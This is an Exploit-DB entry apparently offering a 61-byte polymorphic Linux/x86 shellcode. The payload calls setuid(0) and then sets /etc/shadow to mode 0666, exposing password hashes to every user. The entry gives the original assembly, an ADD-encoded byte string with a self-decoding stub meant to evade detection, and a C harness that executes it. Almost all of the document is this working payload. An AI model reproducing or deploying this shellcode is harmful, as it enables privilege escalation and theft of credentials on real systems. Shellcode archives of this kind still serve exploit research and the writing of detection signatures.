Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes)

EDB-ID:

13722

CVE:

N/A




Platform:

Linux_x86

Date:

2010-05-31


/*
=============================================================================================
 linux/x86 Shellcode Polymorphic - setuid(0) + chmod("/etc/shadow", 0666) Shellcode 61 Bytes  
=============================================================================================
*/
/* 
 * Title: linux/x86 Shellcode Polymorphic - setuid(0) + chmod("/etc/shadow", 0666) Shellcode 61 Bytes  
 * Encode  : _ADD
 * Author: antrhacks
 * Platform: Linux X86
*/

/* 0riginAl ASSembly
 31 db                	xor    %ebx,%ebx
 b0 17                	mov    $0x17,%al
 cd 80                	int    $0x80
 31 c0                	xor    %eax,%eax
 50                   	push   %eax
 68 61 64 6f 77       	push   $0x776f6461
 68 63 2f 73 68       	push   $0x68732f63
 68 2f 2f 65 74       	push   $0x74652f2f
 89 e3                	mov    %esp,%ebx
 66 b9 b6 01          	mov    $0x1b6,%cx
 b0 0f                	mov    $0xf,%al
 cd 80                	int    $0x80
 40                   	inc    %eax
 cd 80                	int    $0x80
*/


#include "stdio.h"

char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x37\x80\x6c\x0e\xff\x13"
"\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\x44\xee\xc3\x2a\xe0\x93\x44\xd3\x63\x7b\x74\x77\x82\x8a\x7b\x76\x42\x86\x7b\x7b\x42\x42\x78\x87\x9c"
"\xf6\x79\xcc\xc9\x14\xc3\x22\xe0\x93\x53\xe0\x93"; 

int main()
{
        printf(" [*] Polymorphic Shellcode - length: %d\n",strlen(shellcode));
        (*(void(*)()) shellcode)();

        return 0;
}